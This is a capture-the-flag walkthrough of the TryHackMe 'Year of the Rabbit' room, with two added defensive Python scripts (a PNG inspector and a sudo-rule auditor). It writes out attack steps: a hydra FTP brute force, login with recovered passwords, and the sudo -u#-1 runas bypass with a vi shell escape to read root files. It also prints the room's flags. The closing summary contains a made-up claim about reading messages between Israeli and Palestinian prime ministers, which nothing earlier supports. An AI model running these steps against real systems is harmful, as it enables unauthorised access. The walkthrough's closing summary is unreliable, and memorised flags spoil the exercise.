Tryhackme - Year of the Rabbit

In this walk through, we will be going through the Year of the Rabbit from Tryhackme. This room is rated as easy on the platform and it covers Enumeration, Password bruteforcing, Exploitation and Privilege Escalation. So, let’s get started without any delay.

Year of the Rabbit

Machine Info:

Title: Year of the Rabbit
IP address: 10.10.122.215
Difficulty: Easy
Objective: Let’s have a nice gentle start to the New Year! Can you hack into the Year of the Rabbit box without falling down a hole?

Enumeration:

  • Starting with a regular nmap scan. Found ports 21, 22 and 80 open, running FTP, SSH and HTTP respectively.

sudo nmap -sS -sV  10.10.122.215 

nmap scan

  • Firing up gobuster on port 80 found the directory /assets. Browsing it reveals style.css, which contains a reference to a hidden page: sup3r_s3cr3t_fl4g.php

wh1terose@fsociety:~$ gobuster dir -u http://10.10.122.215/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.122.215/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/24 21:39:49 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/assets               (Status: 301) [Size: 315] [--> http://10.10.122.215/assets/]
/index.html           (Status: 200) [Size: 7853]                                  
/server-status        (Status: 403) [Size: 278]                                   
===============================================================
2023/04/24 21:41:41 Finished
===============================================================

gobuster scan

Index of /assets

secret flag directory

  • Navigating to the found page, it executes an inline JavaScript snippet which redirects us to YouTube and rickrolls us.

Javascript popup

  • We disable that using Firefox’s configuration settings: go to about:config, search for JavaScript and toggle the setting to false.

about:config

Rick roll

  • Next, as per the hint, I listened to the video, which reveals that it was a rabbit hole. Then, with the Network tab open in the Developer Tools, reloading the page reveals a hidden directory.

Network Tab

  • The hidden directory reveals a file named Hot_Babe.png

Index of WExYY2Cv-qU

  • Running strings on the image file reveals an FTP username and a potential wordlist, which we can use later with hydra to bruteforce the password of the user ftpuser.

strings Hot_Babe.png

FTPuser wordlist
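Text that strings pulls out of an image usually lives either in a tEXt chunk or, more crudely, in bytes appended after the PNG’s final IEND chunk, where no viewer ever looks. The script below is an added example, not code from the original post or from the room: it walks the PNG chunk list, verifies each chunk’s CRC, reports any bytes found after IEND and extracts printable strings from them, which is what strings does for the whole file without telling you where the text came from. It assumes the hidden text was appended after IEND (the post only shows strings output); the sample PNG and the credential-style text it carries are constructed inline.

```python
import re
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, payload):
    """Encode one PNG chunk: length, type, payload, CRC32 over type + payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png(appended=b"", text=None):
    """Constructed 1x1 red RGB PNG, optionally with a tEXt chunk and bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, colour type, ...
    idat = zlib.compress(b"\x00\xff\x00\x00")              # filter byte + one red pixel
    body = _chunk(b"IHDR", ihdr)
    if text is not None:
        body += _chunk(b"tEXt", text)                     # keyword\0text, per the PNG spec
    return PNG_SIGNATURE + body + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + appended


def split_png(data):
    """Walk the chunk list. Returns (chunks, trailing): chunks is a list of
    (type, payload, crc_ok); trailing is every byte after the IEND chunk."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) < length or len(crc_bytes) < 4:
            raise ValueError("truncated %r chunk" % ctype)
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == struct.unpack(">I", crc_bytes)[0]
        chunks.append((ctype.decode("ascii", "replace"), payload, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def printable_strings(blob, min_len=4):
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def analyze_png(data):
    """Summarise where text could be hiding: tEXt chunks, corrupted chunks, trailing data."""
    chunks, trailing = split_png(data)
    return {
        "chunks": [c[0] for c in chunks],
        "bad_crc": [c[0] for c in chunks if not c[2]],
        "text_chunks": [c[1].replace(b"\x00", b": ", 1).decode("latin-1") for c in chunks if c[0] == "tEXt"],
        "trailing_length": len(trailing),
        "trailing_strings": printable_strings(trailing),
    }


if __name__ == "__main__":
    # With a path argument the real file is inspected; otherwise a constructed sample with
    # hypothetical credential text appended after IEND is used
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_sample_png(b"\nuser: ftpuser\ncandidate1\ncandidate2\n")
    report = analyze_png(data)
    print("chunks:", report["chunks"], "bad CRC:", report["bad_crc"])
    print("tEXt:", report["text_chunks"])
    print("bytes after IEND:", report["trailing_length"])
    for s in report["trailing_strings"]:
        print("  ", s)
```

Running it against a real image tells you immediately whether the strings are part of the image format or bolted on after it; a non-zero trailing length on a file that renders fine is the classic sign of appended data.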

hydra -l ftpuser -P Wordlist ftp://10.10.122.215 

hydra bruteforce

wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ ftp 10.10.122.215 
Connected to 10.10.122.215.
220 (vsFTPd 3.0.2)
Name (10.10.122.215:wh1terose): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.
ftp> ascii
200 Switching to ASCII mode.
ftp> get Eli's_Creds.txt 
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
WARNING! 11 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
758 bytes received in 0.00 secs (5.0551 MB/s)
ftp> exit
221 Goodbye.

  • Got a file “Eli’s_Creds.txt”. It looks encoded, but CyberChef was of no use: the content is actually a program in the esoteric language Brainfuck. Decoding it with an online interpreter gives Eli’s password.

wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ cat "Eli's_Creds.txt" 
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++

Brainfuck decoder

Username: Eli

Password: DSpDiM1wAEwid

Initial Access:

  • Got our first shell using Eli’s creds with SSH.

ssh banner

  • As per the SSH banner message, I located the hidden secret place with the find command. It is /usr/games/s3cr3t, and the file inside gives us Gwendoline’s password.

eli@year-of-the-rabbit:/$ find / -name s3cr3t 2> /dev/null
/usr/games/s3cr3t

eli@year-of-the-rabbit:/$ 
eli@year-of-the-rabbit:/$ cd /usr/games/s3cr3t/
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 23  2020 .
drwxr-xr-x 3 root root 4096 Jan 23  2020 ..
-rw-r--r-- 1 root root  138 Jan 23  2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root

Username: gwendoline

Password: MniVCQVhQHUNI

gwendoline password

  • We got our user flag!

user.txt

Privilege Escalation:

  • For privesc, this was also a rabbit hole. sudo -l shows that gwendoline may run vi on her own user.txt as any user except root, a (ALL, !root) rule. That restriction can be bypassed using the “sudo 1.8.27 - Security Bypass” exploit (https://www.exploit-db.com/exploits/47502).

gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$ 

sudo -l

  • Run the command below. When vi opens, type :!cat /root/root.txt and press Enter, and you will get your root flag.

gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

Press ENTER or type command to continue

root.txt

root flag
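What made this rule exploitable is the combination of a deny-list Runas field, (ALL, !root), which sudo releases before 1.8.28 failed to enforce against the -u#-1 form used above, and a command (vi) that can spawn a shell from inside. The script below is an added example, not code from the original post or from the room: it parses sudo -l output, flags runas negations, NOPASSWD rules and programs with built-in shell escapes, and rates the negation as high when the sudo version passed in predates the fix. SUDO_L_OUTPUT is the text shown above; HARDENED_OUTPUT is a constructed rule for comparison, and the 1.8.28 threshold is sudo’s own fix version.

```python
import os
import re

# Output of `sudo -l` on the box, as shown above
SUDO_L_OUTPUT = r"""Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""

# Constructed hardened rule for comparison: explicit runas user, sudoedit instead of an editor, password required
HARDENED_OUTPUT = """User gwendoline may run the following commands on year-of-the-rabbit:
    (www-data) sudoedit /var/www/html/index.html
"""

# "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")
# Programs that hand the caller a shell from inside (":!sh" in vi, "!sh" in less/more/man)
SHELL_ESCAPE_PROGRAMS = {"vi", "vim", "view", "less", "more", "man"}


def version_tuple(version):
    """'1.8.27' or '1.9.5p2' -> (1, 8, 27) / (1, 9, 5)."""
    return tuple(int(x) for x in re.match(r"(\d+)\.(\d+)\.(\d+)", version).groups())


def negation_bypassable(sudo_version):
    """Runas negations are enforced correctly from sudo 1.8.28 on; older releases
    resolve a user id of -1 to 0 and run the command as root anyway."""
    return version_tuple(sudo_version) < (1, 8, 28)


def audit_sudo_l(text, sudo_version=None):
    """Return (rule, severity, line, advice) tuples for every risky command rule."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmd = m.group("runas"), m.group("tags"), m.group("cmd")
        prog = os.path.basename(cmd.split()[0])
        if "!" in runas:
            severity = "high" if sudo_version and negation_bypassable(sudo_version) else "medium"
            findings.append(("runas_negation", severity, line.strip(),
                             "deny-list runas (%s); replace with an explicit allow list of users" % runas))
        if prog in SHELL_ESCAPE_PROGRAMS:
            findings.append(("shell_escape_program", "high", line.strip(),
                             "%s allows shell escapes; use sudoedit or a wrapper that cannot spawn a shell" % prog))
        if "NOPASSWD:" in tags:
            findings.append(("nopasswd", "low", line.strip(),
                             "no password prompt; re-authentication is disabled for this rule"))
    return findings


if __name__ == "__main__":
    # Usage: pipe `sudo -l` output in, e.g.  sudo -l | python3 audit.py
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SUDO_L_OUTPUT
    for rule, severity, line, advice in audit_sudo_l(text, sudo_version="1.8.27"):
        print("[%s] %s: %s\n    %s" % (severity.upper(), rule, line, advice))
```

Distributions backport security fixes without bumping the upstream version string, so treat the version-based severity as a hint and confirm against the package changelog; the durable fix is to rewrite the rule with the users who may actually be targeted and to replace vi with sudoedit, which never gives the caller a shell.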

Task 1 – Flags

Question 1 – What is the user flag?

THM{1107174691af9ff3681d2b5bdb5740b1589bae53}

Question 2 – What is the root flag?

THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

Conclusion:

So that was “Year of the Rabbit” for you. We started off with a regular nmap scan and found three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP). Next, we performed directory bruteforcing with gobuster and found the /assets directory, which led us to a secret page named sup3r_s3cr3t_fl4g.php. After getting rickrolled by the page, we used the Network tab to reveal a hidden directory called WExYY2Cv-qU, which holds a file named Hot_Babe.png. Next, I used the strings command to extract a potential password wordlist hidden in the image file. With that wordlist, we used hydra to bruteforce the FTP password of the user ftpuser. Moving on, we got Eli’s creds from the FTP server, encoded in the Brainfuck language. We decoded them and used them to get our initial access via SSH. At last, we moved to the privilege escalation part, where we used the vi binary to read the contents of root.txt and the messages between the Israeli and Palestinian prime ministers. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.
